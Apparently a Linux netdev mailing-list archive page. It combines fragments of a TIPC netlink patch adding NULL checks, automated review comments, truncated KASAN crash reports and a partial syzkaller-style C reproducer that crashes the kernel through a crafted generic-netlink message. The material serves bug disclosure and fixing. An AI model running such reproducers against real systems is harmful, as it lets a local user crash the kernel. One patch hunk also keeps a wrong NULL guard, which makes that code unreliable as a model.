(err) +return err; + +if (!link[TIPC_NLA_LINK_STATS]) +return -EINVAL; + +err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); +if (err) +return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; -nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); +if (!attrs[TIPC_NLA_LINK]) +return -EINVAL; + +err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); +if (err) +return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); 
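Review bot: Style: tipc_nl_compat_link_stat_dump now repeats the same sequence three times — test the attribute, call nla_parse_nested() with a NULL policy, test err — and tipc_nl_compat_link_dump in the next hunk repeats it again, which is the kind of copy-and-paste that lets one guard test the wrong attribute (the name-table hunk of this same patch does exactly that). A small static helper that folds the presence check into the parse keeps every call site to an `err = …; if (err) return err;` pair and gives a single place to say why an absent nested attribute is an error. The function's tail is outside the hunk.

```c
/* Parse nested attribute @attr into @tb with no policy. An absent @attr is
 * rejected here because every caller indexes @tb right after parsing. */
static int tipc_nl_compat_parse_nested(struct nlattr *tb[], int maxtype,
				       const struct nlattr *attr)
{
	if (!attr)
		return -EINVAL;
	return nla_parse_nested(tb, maxtype, attr, NULL);
}

/* … unchanged: tipc_nl_compat_link_stat_dump signature and locals … */
	err = tipc_nl_compat_parse_nested(link, TIPC_NLA_LINK_MAX,
					  attrs[TIPC_NLA_LINK]);
	if (err)
		return err;
	err = tipc_nl_compat_parse_nested(prop, TIPC_NLA_PROP_MAX,
					  link[TIPC_NLA_LINK_PROP]);
	if (err)
		return err;
	err = tipc_nl_compat_parse_nested(stats, TIPC_NLA_STATS_MAX,
					  link[TIPC_NLA_LINK_STATS]);
	if (err)
		return err;
	/* … unchanged: name comparison and the rest of the function … */
```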
@@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; -nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, - attrs[TIPC_NLA_NAME_TABLE], NULL); +if (!attrs[TIPC_NLA_NAME_TABLE]) +return -EINVAL; -nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], - NULL); +err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); +if (err) +return err; + +if (!attrs[TIPC_NLA_NAME_TABLE]) +return -EINVAL; + +err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); +if (err) +return err; ntq = (struct tipc_name_table_query *)TLV_DATA(msg->req); @@ -813,10 +854,17 @@ out: static int __tipc_nl_compat_publ_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; u32 type, lower, upper; struct nlattr *publ[TIPC_NLA_PUBL_MAX + 1]; -nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], NULL); +if (!attrs[TIPC_NLA_PUBL]) +r
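Review bot: In tipc_nl_compat_name_table_dump the second guard tests `attrs[TIPC_NLA_NAME_TABLE]` a second time — the first guard already proved it non-NULL — instead of `nt[TIPC_NLA_NAME_TABLE_PUBL]`, so the `nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], NULL)` that follows can still be handed a NULL attribute, which is exactly the dereference this patch sets out to remove. The line should read `if (!nt[TIPC_NLA_NAME_TABLE_PUBL])`; the `[PATCH net]` resend of this change above has it right. The rest of the function, including the `out:` label, lies beyond this hunk.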
BUG: net/ipv4: KASAN: use-after-free in tcp_sendmsg
around the buggy address: 880038027880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >880038027980: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 880038027a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880038027a80: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc == Best Regards, Baozeng Ding
BUG: net/ipv4: KASAN: use-after-free in tcp_v4_rcv
nal+0x1b5/0x390 net/core/dev.c:4226 [< inline >] ? __net_timestamp include/linux/skbuff.h:3099 [] ? netif_receive_skb_internal+0x14a/0x390 net/core/dev.c:4207 [] ? dev_cpu_callback+0x690/0x690 net/core/dev.c:7755 [] ? dev_gro_receive+0x1d9/0x16f0 net/core/dev.c:4514 [< inline >] ? skb_is_gso include/linux/skbuff.h:3648 [] ? dev_gro_receive+0x665/0x16f0 net/core/dev.c:4426 [] ? kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:482 [< inline >] ? trace_kmem_cache_alloc include/trace/events/kmem.h:53 [] ? kmem_cache_alloc+0x1f9/0x2f0 mm/slub.c:2587 [] ? eth_type_trans+0x2a0/0x5b0 net/ethernet/eth.c:186 [< inline >] napi_skb_finish net/core/dev.c:4553 [] napi_gro_receive+0x2c2/0x480 net/core/dev.c:4585 [< inline >] e1000_receive_skb drivers/net/ethernet/intel/e1000/e1000_main.c:4035 [] e1000_clean_rx_irq+0x440/0x1110 drivers/net/ethernet/intel/e1000/e1000_main.c:4491 [] ? e1000_enter_82542_rst+0x260/0x260 drivers/net/ethernet/intel/e1000/e1000_main.c:2148 [] e1000_clean+0xa08/0x24a0 drivers/net/ethernet/intel/e1000/e1000_main.c:3836 [] ? check_preempt_wakeup+0x3c9/0xa70 kernel/sched/fair.c:5411 [] ? e1000_unmap_and_free_tx_resource.isra.46+0x3e0/0x3e0 drivers/net/ethernet/intel/e1000/e1000_main.c:1972 [] ? trace_hardirqs_off+0xd/0x10 kernel/locking/lockdep.c:2772 [] ? debug_check_no_locks_freed+0x290/0x290 kernel/locking/lockdep.c:4212 [< inline >] napi_poll net/core/dev.c:5087 [] net_rx_action+0x751/0xd80 net/core/dev.c:5152 [] ? add_interrupt_randomness+0x2bc/0x570 drivers/char/random.c:922 [] ? sk_busy_loop+0x1130/0x1130 include/trace/events/napi.h:13 [] ? handle_irq_event+0xb2/0x140 kernel/irq/handle.c:194 [< inline >] ? apic_eoi ./arch/x86/include/asm/apic.h:402 [< inline >] ? ack_APIC_irq ./arch/x86/include/asm/apic.h:446 [] ? ioapic_ack_level+0x165/0x450 arch/x86/kernel/apic/io_apic.c:1814 [< inline >] ? invoke_softirq kernel/softirq.c:350 [] ? 
irq_exit+0x15d/0x190 kernel/softirq.c:391 [] __do_softirq+0x22b/0x8da kernel/softirq.c:273 [< inline >] invoke_softirq kernel/softirq.c:350 [] irq_exit+0x15d/0x190 kernel/softirq.c:391 [< inline >] exiting_irq ./arch/x86/include/asm/apic.h:658 [] do_IRQ+0x86/0x1a0 arch/x86/kernel/irq.c:252 [] common_interrupt+0x8c/0x8c arch/x86/entry/entry_64.S:454 [< inline >] ? copy_pte_range mm/memory.c:945 [< inline >] ? copy_pmd_range mm/memory.c:1003 [< inline >] ? copy_pud_range mm/memory.c:1025 [] ? copy_page_range+0xa69/0x19d0 mm/memory.c:1087 [< inline >] ? copy_pte_range mm/memory.c:945 [< inline >] ? copy_pmd_range mm/memory.c:1003 [< inline >] ? copy_pud_range mm/memory.c:1025 [] ? copy_page_range+0xa4a/0x19d0 mm/memory.c:1087 [< inline >] ? rb_insert_augmented include/linux/rbtree_augmented.h:60 [< inline >] ? __anon_vma_interval_tree_insert mm/interval_tree.c:72 [] ? anon_vma_interval_tree_insert+0x233/0x2d0 mm/interval_tree.c:83 [] ? vm_iomap_memory+0x130/0x130 mm/memory.c:1836 [< inline >] ? vma_rb_insert include/linux/rbtree_augmented.h:60 [] ? __vma_link_rb+0x445/0x5d0 mm/mmap.c:531 [< inline >] dup_mmap kernel/fork.c:513 [< inline >] dup_mm kernel/fork.c:937 [< inline >] copy_mm kernel/fork.c:991 [] copy_process.part.37+0x468d/0x5a50 kernel/fork.c:1456 [] ? __cleanup_sighand+0x50/0x50 kernel/fork.c:1105 [< inline >] copy_process kernel/fork.c:1282 [] _do_fork+0x1a9/0xcd0 kernel/fork.c:1731 [] ? fork_idle+0x110/0x110 include/linux/list.h:601 [] ? __fsnotify_parent+0x5e/0x2b0 fs/notify/fsnotify.c:98 [< inline >] ? inc_syscr include/linux/sched.h:3178 [] ? vfs_read+0x223/0x310 fs/read_write.c:499 [< inline >] SYSC_clone kernel/fork.c:1840 [] SyS_clone+0x37/0x50 kernel/fork.c:1834 [] ? ptregs_sys_rt_sigreturn+0x10/0x10 arch/x86/include/generated/asm/syscalls_64.h:16 [] do_syscall_64+0x1ad/0x4b0 arch/x86/entry/common.c:350 [] ? 
sys_vfork+0x30/0x30 kernel/fork.c:1813 [] entry_SYSCALL64_slow_path+0x25/0x25 arch/x86/entry/entry_64.S:248 Memory state around the buggy address: 880038027880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027980: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 880038027a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880038027a80: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc == Best Regards, Baozeng Ding
BUG: use-after-free in netlink_dump
sg_nosec net/socket.c:612 [] ? ___sys_sendmsg+0x860/0x860 net/socket.c:1943 [< inline >] ? rcu_read_unlock include/linux/rcupdate.h:922 [] ? __fget+0x20c/0x3b0 fs/file.c:712 [< inline >] ? rcu_lock_release include/linux/rcupdate.h:491 [< inline >] ? rcu_read_unlock include/linux/rcupdate.h:926 [] ? __fget+0x235/0x3b0 fs/file.c:712 [] ? __fget+0x47/0x3b0 fs/file.c:696 [] ? __fget_light+0xa1/0x1f0 fs/file.c:759 [] ? __fdget+0x18/0x20 fs/file.c:764 [] ? sockfd_lookup_light+0xf8/0x1f0 net/socket.c:463 [] __sys_recvmsg+0xce/0x170 net/socket.c:2150 [] ? SyS_sendmmsg+0x60/0x60 net/socket.c:2064 [< inline >] SYSC_recvmsg net/socket.c:2162 [] SyS_recvmsg+0x2d/0x50 net/socket.c:2157 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Memory state around the buggy address: 880036ae7880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880036ae7900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >880036ae7980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 880036ae7a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880036ae7a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
Re: BUG: net/tipc: NULL-ptr dereference in tipc_nl_publ_dump
On 2016/5/15 1:13, Eric Dumazet wrote: On Sat, 2016-05-14 at 23:22 +0800, Baozeng Ding wrote: Hello all, The following program triggers NULL-ptr dereference in tipc_nl_publ_dump. The kernel version is 4.6.0-rc7+ (on May 13 commit 1410b74e4061e05a5d2bffb1f99829efce27c8a9). Thanks. -- netlink: 1 bytes leftover after parsing attributes in process `syz-executor'. kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: [#1] SMP KASAN Modules linked in: CPU: 2 PID: 1346 Comm: syz-executor Not tainted 4.6.0-rc7+ #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 task: 88001eb1dd40 ti: 88001bd98000 task.ti: 88001bd98000 RIP: 0010:[] [] tipc_nl_publ_dump+0xa39/0xdf0 RSP: 0018:88001bd9f428 EFLAGS: 00010246 RAX: dc00 RBX: 88003562efc0 RCX: c900012c7000 RDX: RSI: 880036215d98 RDI: 8800196fda98 RBP: 88001bd9f678 R08: 0001 R09: R10: ed00032dfb5a R11: 11131255 R12: R13: 88002d0f8040 R14: R15: 88002ea220a8 FS: 7f0b7c70f700() GS:88003620() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: 20b5d7f2 CR3: 301fe000 CR4: 06e0 Stack: 88002ea22100 88002ea220f8 88002ea220f0 1bd9f520 1100037b3e92 88002ea220b0 88001bd9f498 815bcc6e 880036223e40 88002fd60008 Call Trace: [] genl_lock_dumpit+0x68/0x90 net/netlink/genetlink.c:517 [] netlink_dump+0x36a/0xa40 net/netlink/af_netlink.c:2108 [] __netlink_dump_start+0x4e9/0x760 net/netlink/af_netlink.c:2196 [] genl_family_rcv_msg+0xa91/0xc30 net/netlink/genetlink.c:584 [] genl_rcv_msg+0x1ab/0x260 net/netlink/genetlink.c:658 [] netlink_rcv_skb+0x29c/0x390 net/netlink/af_netlink.c:2277 [] genl_rcv+0x28/0x40 net/netlink/genetlink.c:669 [< inline >] netlink_unicast_kernel net/netlink/af_netlink.c:1214 [] netlink_unicast+0x5a2/0x890 net/netlink/af_netlink.c:1240 [] netlink_sendmsg+0x981/0xcb0 net/netlink/af_netlink.c:1786 [< inline >] sock_sendmsg_nosec net/socket.c:612 [] sock_sendmsg+0xca/0x110 net/socket.c:622 [] ___sys_sendmsg+0x728/0x860 
net/socket.c:1946 [] __sys_sendmsg+0xd1/0x170 net/socket.c:1980 [< inline >] SYSC_sendmsg net/socket.c:1991 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Code: df 49 8d 7e 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 df 01 00 00 4d 8b 76 10 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 14 02 4c 89 f0 83 e0 07 83 c0 01 38 d0 7c 08 84 d2 0f 85 RIP [] tipc_nl_publ_dump+0xa39/0xdf0 net/tipc/socket.c:2810 RSP ---[ end trace e8355fded2057a4f ]--- Probable fix : diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 3eeb50a27b89..5f80d3fa9c85 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -2807,6 +2807,9 @@ int tipc_nl_publ_dump(struct sk_buff *skb, struct netlink_callback *cb) if (err) return err; + if (!attrs[TIPC_NLA_SOCK]) + return -EINVAL; + err = nla_parse_nested(sock, TIPC_NLA_SOCK_MAX, attrs[TIPC_NLA_SOCK], tipc_nl_sock_policy); Yes. I tested with the patch. It works. Thanks.
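Review bot: The guard is the right fix, but the shape it corrects — nla_parse_nested() called on a top-level attribute that was never tested for presence, with the request arriving from user space over netlink — is not specific to tipc_nl_publ_dump: the compat dump callbacks in net/tipc/netlink_compat.c (tipc_nl_compat_bearer_dump, tipc_nl_compat_link_stat_dump, tipc_nl_compat_link_dump, tipc_nl_compat_name_table_dump) parse `attrs[...]` the same way, so the audit should not stop at this one call site. A short comment on the new check, `/* TIPC_NLA_SOCK may be absent from the request; nla_parse_nested() would dereference NULL */`, records why it sits here. How `attrs` is filled, and whether the entries later read from `sock` are themselves checked, is outside the hunk.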
BUG: net/tipc: NULL-ptr dereference in tipc_nl_publ_dump
Hello all, The following program triggers NULL-ptr dereference in tipc_nl_publ_dump. The kernel version is 4.6.0-rc7+ (on May 13 commit 1410b74e4061e05a5d2bffb1f99829efce27c8a9). Thanks. -- netlink: 1 bytes leftover after parsing attributes in process `syz-executor'. kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: [#1] SMP KASAN Modules linked in: CPU: 2 PID: 1346 Comm: syz-executor Not tainted 4.6.0-rc7+ #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 task: 88001eb1dd40 ti: 88001bd98000 task.ti: 88001bd98000 RIP: 0010:[] [] tipc_nl_publ_dump+0xa39/0xdf0 RSP: 0018:88001bd9f428 EFLAGS: 00010246 RAX: dc00 RBX: 88003562efc0 RCX: c900012c7000 RDX: RSI: 880036215d98 RDI: 8800196fda98 RBP: 88001bd9f678 R08: 0001 R09: R10: ed00032dfb5a R11: 11131255 R12: R13: 88002d0f8040 R14: R15: 88002ea220a8 FS: 7f0b7c70f700() GS:88003620() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: 20b5d7f2 CR3: 301fe000 CR4: 06e0 Stack: 88002ea22100 88002ea220f8 88002ea220f0 1bd9f520 1100037b3e92 88002ea220b0 88001bd9f498 815bcc6e 880036223e40 88002fd60008 Call Trace: [] genl_lock_dumpit+0x68/0x90 net/netlink/genetlink.c:517 [] netlink_dump+0x36a/0xa40 net/netlink/af_netlink.c:2108 [] __netlink_dump_start+0x4e9/0x760 net/netlink/af_netlink.c:2196 [] genl_family_rcv_msg+0xa91/0xc30 net/netlink/genetlink.c:584 [] genl_rcv_msg+0x1ab/0x260 net/netlink/genetlink.c:658 [] netlink_rcv_skb+0x29c/0x390 net/netlink/af_netlink.c:2277 [] genl_rcv+0x28/0x40 net/netlink/genetlink.c:669 [< inline >] netlink_unicast_kernel net/netlink/af_netlink.c:1214 [] netlink_unicast+0x5a2/0x890 net/netlink/af_netlink.c:1240 [] netlink_sendmsg+0x981/0xcb0 net/netlink/af_netlink.c:1786 [< inline >] sock_sendmsg_nosec net/socket.c:612 [] sock_sendmsg+0xca/0x110 net/socket.c:622 [] ___sys_sendmsg+0x728/0x860 net/socket.c:1946 [] __sys_sendmsg+0xd1/0x170 net/socket.c:1980 [< inline >] SYSC_sendmsg 
net/socket.c:1991 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Code: df 49 8d 7e 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 df 01 00 00 4d 8b 76 10 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 14 02 4c 89 f0 83 e0 07 83 c0 01 38 d0 7c 08 84 d2 0f 85 RIP [] tipc_nl_publ_dump+0xa39/0xdf0 net/tipc/socket.c:2810 RSP ---[ end trace e8355fded2057a4f ]--- #include #include #include #include #include #include int main() { mmap((void *)0x2000ul, 0xd7f000ul, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0); int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); *(uint64_t*)0x2363 = (uint64_t)0x0; *(uint32_t*)0x236b = (uint32_t)0x0; *(uint64_t*)0x2373 = (uint64_t)0x20001ff0; *(uint64_t*)0x237b = (uint64_t)0x1; *(uint64_t*)0x2383 = (uint64_t)0x20aab000; *(uint64_t*)0x238b = (uint64_t)0x5; *(uint32_t*)0x2393 = (uint32_t)0x81; *(uint64_t*)0x20001ff0 = (uint64_t)0x20001000; *(uint64_t*)0x20001ff8 = (uint64_t)0x3e; *(uint32_t*)0x20001000 = (uint32_t)0x15; *(uint16_t*)0x20001004 = (uint16_t)0x22; *(uint16_t*)0x20001006 = (uint16_t)0x71b; *(uint32_t*)0x20001008 = (uint32_t)0x2; *(uint32_t*)0x2000100c = (uint32_t)0x2; *(uint8_t*)0x20001010 = (uint8_t)0x7; *(uint8_t*)0x20001011 = (uint8_t)0x8; *(uint8_t*)0x20001012 = (uint8_t)0xa0ad8f89e1b1651f; *(uint8_t*)0x20001013 = (uint8_t)0x44; *(uint8_t*)0x20001014 = (uint8_t)0x1; *(uint32_t*)0x20001015 = (uint32_t)0x15; *(uint16_t*)0x20001019 = (uint16_t)0xfffa; *(uint16_t*)0x2000101b = (uint16_t)0x100; *(uint32_t*)0x2000101d = (uint32_t)0x1ff; *(uint32_t*)0x20001021 = (uint32_t)0x4; *(uint8_t*)0x20001025 = (uint8_t)0x3; *(uint8_t*)0x20001026 = (uint8_t)0x7; *(uint8_t*)0x20001027 = (uint8_t)0x4; *(uint8_t*)0x20001028 = (uint8_t)0x2; *(uint8_t*)0x20001029 = (uint8_t)0x9; *(uint32_t*)0x2000102a = (uint32_t)0x14; *(uint16_t*)0x2000102e = (uint16_t)0x1; *(uint16_t*)0x20001030 = (uint16_t)0x400; *(uint32_t*)0x20001032 = (uint32_t)0x8000; 
*(uint32_t*)0x20001036 = (uint32_t)0x60; *(uint8_t*)0x2000103a = (uint8_t)0x1; *(uint8_t*)0x2000103b = (uint8_t)0x1ff; *(uint8_t*)0x2000103c = (uint8_t)0x3ff; *(uint8_t
Re: BUG: net/netfilter: KASAN: stack-out-of-bounds in tcp_packet
On 2016/3/28 10:35, Baozeng Ding wrote: On 2016/3/28 6:25, Jozsef Kadlecsik wrote: On Mon, 28 Mar 2016, Jozsef Kadlecsik wrote: On Sun, 27 Mar 2016, Baozeng Ding wrote: The following program triggers stack-out-of-bounds in tcp_packet. The kernel version is 4.5 (on Mar 16 commit 09fd671ccb2475436bd5f597f751ca4a7d177aea). Uncovered with syzkaller. Thanks. == BUG: KASAN: stack-out-of-bounds in tcp_packet+0x4b77/0x51c0 at addr 8800a45df3c8 Read of size 1 by task 0327/11132 page:ea00029177c0 count:0 mapcount:0 mapping: (null) index:0x0 flags: 0x1fffc00() page dumped because: kasan: bad access detected CPU: 1 PID: 11132 Comm: 0327 Tainted: GB 4.5.0+ #12 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 0001 8800a45df148 82945051 8800a45df1d8 8800a45df3c8 0027 0001 8800a45df1c8 81709f88 8800b4f7e3d0 0028 0286 Call Trace: [< inline >] __dump_stack /kernel/lib/dump_stack.c:15 [] dump_stack+0xb3/0x112 /kernel/lib/dump_stack.c:51 [< inline >] print_address_description /kernel/mm/kasan/report.c:150 [] kasan_report_error+0x4f8/0x530 /kernel/mm/kasan/report.c:236 [] ? skb_copy_bits+0x49d/0x6d0 /kernel/net/core/skbuff.c:1675 [< inline >] ? spin_lock_bh /kernel/include/linux/spinlock.h:307 [] ? tcp_packet+0x1c9/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:833 [< inline >] kasan_report /kernel/mm/kasan/report.c:259 [] __asan_report_load1_noabort+0x3e/0x40 /kernel/mm/kasan/report.c:277 [< inline >] ? tcp_sack /kernel/net/netfilter/nf_conntrack_proto_tcp.c:473 [< inline >] ? tcp_in_window /kernel/net/netfilter/nf_conntrack_proto_tcp.c:527 [] ? tcp_packet+0x4b77/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1036 [< inline >] tcp_sack /kernel/net/netfilter/nf_conntrack_proto_tcp.c:473 [< inline >] tcp_in_window /kernel/net/netfilter/nf_conntrack_proto_tcp.c:527 [] tcp_packet+0x4b77/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1036 [] ? memset+0x28/0x30 /kernel/mm/kasan/kasan.c:302 [] ? 
tcp_new+0x1a4/0xc20 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1122 [< inline >] ? build_report /kernel/include/net/netlink.h:499 [] ? xfrm_send_report+0x426/0x450 /kernel/net/xfrm/xfrm_user.c:3039 [] ? tcp_new+0xc20/0xc20 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1169 [] ? init_conntrack+0xca/0x9e0 /kernel/net/netfilter/nf_conntrack_core.c:972 [] ? nf_conntrack_alloc+0x40/0x40 /kernel/net/netfilter/nf_conntrack_core.c:903 [] ? tcp_init_net+0x6e0/0x6e0 /kernel/include/net/netfilter/nf_conntrack_l4proto.h:137 [] ? ipv4_get_l4proto+0x262/0x390 /kernel/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c:89 [] ? nf_ct_get_tuple+0xaf/0x190 /kernel/net/netfilter/nf_conntrack_core.c:197 [] nf_conntrack_in+0x8ee/0x1170 /kernel/net/netfilter/nf_conntrack_core.c:1177 [] ? init_conntrack+0x9e0/0x9e0 /kernel/net/netfilter/nf_conntrack_core.c:287 [] ? ipt_do_table+0xa16/0x1260 /kernel/net/ipv4/netfilter/ip_tables.c:423 [] ? trace_hardirqs_on+0xd/0x10 /kernel/kernel/locking/lockdep.c:2635 [] ? __local_bh_enable_ip+0x6b/0xc0 /kernel/kernel/softirq.c:175 [] ? check_entry.isra.4+0x190/0x190 /kernel/net/ipv6/netfilter/ip6_tables.c:594 [] ? ip_reply_glue_bits+0xc0/0xc0 /kernel/net/ipv4/ip_output.c:1530 [] ipv4_conntrack_local+0x14e/0x1a0 /kernel/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c:161 [] ? iptable_raw_hook+0x9d/0x1e0 /kernel/net/ipv4/netfilter/iptable_raw.c:32 [] nf_iterate+0x15d/0x230 /kernel/net/netfilter/core.c:274 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] nf_hook_slow+0x1ad/0x310 /kernel/net/netfilter/core.c:306 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] ? prandom_u32+0x24/0x30 /kernel/lib/random32.c:83 [] ? ip_idents_reserve+0x9f/0xf0 /kernel/net/ipv4/route.c:484 [< inline >] nf_hook_thresh /kernel/include/linux/netfilter.h:187 [< inline >] nf_hook /kernel/include/linux/netfilter.h:197 [] __ip_local_out+0x263/0x3c0 /kernel/net/ipv4/ip_output.c:104 [] ? 
ip_finish_output+0xd00/0xd00 /kernel/include/net/ip.h:322 [] ? __ip_flush_pending_frames.isra.45+0x2e0/0x2e0 /kernel/net/ipv4/ip_output.c:1337 [] ? __ip_make_skb+0xfe6/0x1610 /kernel/net/ipv4/ip_output.c:1436 [] ip_local_out+0x2d/0x1c0 /kernel/net/ipv4/ip_output.c:113 [] ip_send_skb+0x3c/0xc0 /kernel/net/ipv4/ip_output.c:1443 [] ip_push_pending_frames+0x64/0x80 /kernel/net/ipv4/ip_output.c:1463 [< inline >] rcu_read_unlock /kernel/include/linux/rcupdate.h:922 [] raw_sendmsg+0x17bb/0x25c0 /kernel/net/ieee802154/socket.c:53 [] ? dst_output+0x190/0x190 /kernel/include/net/dst.h:492 [< inline >] ? trace_mm_page_alloc /k
BUG: net/netfilter: KASAN: stack-out-of-bounds in tcp_packet
0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? is_module_text_address+0x10/0x20 /kernel/kernel/module.c:4057 [] ? __kernel_text_address+0x73/0xa0 /kernel/kernel/extable.c:103 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? trace_hardirqs_on+0xd/0x10 /kernel/kernel/locking/lockdep.c:2635 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x73/0x4c0 /kernel/net/ipv4/af_inet.c:729 [< inline >] ? rcu_read_unlock /kernel/include/linux/rcupdate.h:922 [< inline >] ? sock_rps_record_flow_hash /kernel/include/net/sock.h:867 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x1fa/0x4c0 /kernel/net/ipv4/af_inet.c:729 [] inet_sendmsg+0x2f5/0x4c0 /kernel/net/ipv4/af_inet.c:736 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x73/0x4c0 /kernel/net/ipv4/af_inet.c:729 [] ? inet_recvmsg+0x4a0/0x4a0 /kernel/include/linux/compiler.h:222 [< inline >] sock_sendmsg_nosec /kernel/net/socket.c:611 [] sock_sendmsg+0xca/0x110 /kernel/net/socket.c:621 [] SYSC_sendto+0x208/0x350 /kernel/net/socket.c:1651 [] ? SYSC_connect+0x2e0/0x2e0 /kernel/net/socket.c:1543 [] ? __pmd_alloc+0x350/0x350 /kernel/mm/memory.c:3928 [] ? __do_page_fault+0x2ab/0x8e0 /kernel/arch/x86/mm/fault.c:1184 [] ? __do_page_fault+0x3a0/0x8e0 /kernel/arch/x86/mm/fault.c:1271 [] ? up_read+0x1a/0x40 /kernel/kernel/locking/rwsem.c:79 [] ? 
